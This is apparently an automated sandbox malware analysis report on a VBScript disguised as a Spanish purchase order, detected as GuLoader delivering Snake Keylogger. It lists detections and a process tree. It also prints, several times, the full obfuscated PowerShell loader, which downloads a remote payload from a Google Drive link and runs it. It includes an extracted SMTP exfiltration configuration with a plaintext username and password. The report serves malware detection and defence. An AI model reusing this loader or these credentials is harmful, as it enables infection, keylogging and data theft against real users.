Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs

Overview

General Information

Sample name:Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs
renamed because original name is a hash value
Original sample name:Distribuciones Enelca Jan, S.L. PEDIDO 456799.vbs
Analysis ID:1540334
MD5:3f13eef87515d70fbdfedc6de7b6efc4
SHA1:8d2394c2e4daada6b8d9af1b60d8d11130ac1845
SHA256:a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237
Tags:vbsuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7792 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 1516 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4104 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "daniberto@daniberto.com", "Password": "Fabrica1221.", "Host": "mail.daniberto.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.1722877673.0000000008160000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000007.00000002.2618677308.00000000251F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000005.00000002.1723278711.00000000089D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_7924.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_1516.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc796:$b2: ::FromBase64String(
              • 0xb817:$s1: -join
              • 0x4fc3:$s4: +=
              • 0x5085:$s4: +=
              • 0x92ac:$s4: +=
              • 0xb3c9:$s4: +=
              • 0xb6b3:$s4: +=
              • 0xb7f9:$s4: +=
              • 0x15f8d:$s4: +=
              • 0x1600d:$s4: +=
              • 0x160d3:$s4: +=
              • 0x16153:$s4: +=
              • 0x16329:$s4: +=
              • 0x163ad:$s4: +=
              • 0xc03f:$e4: Get-WmiObject
              • 0xc22e:$e4: Get-Process
              • 0xc286:$e4: Start-Process
              • 0x16cc5:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", CommandLine|base64offset|contains: wq, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", ProcessId: 7792, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4104, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49970
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", CommandLine|base64offset|contains: wq, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs", ProcessId: 7792, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor 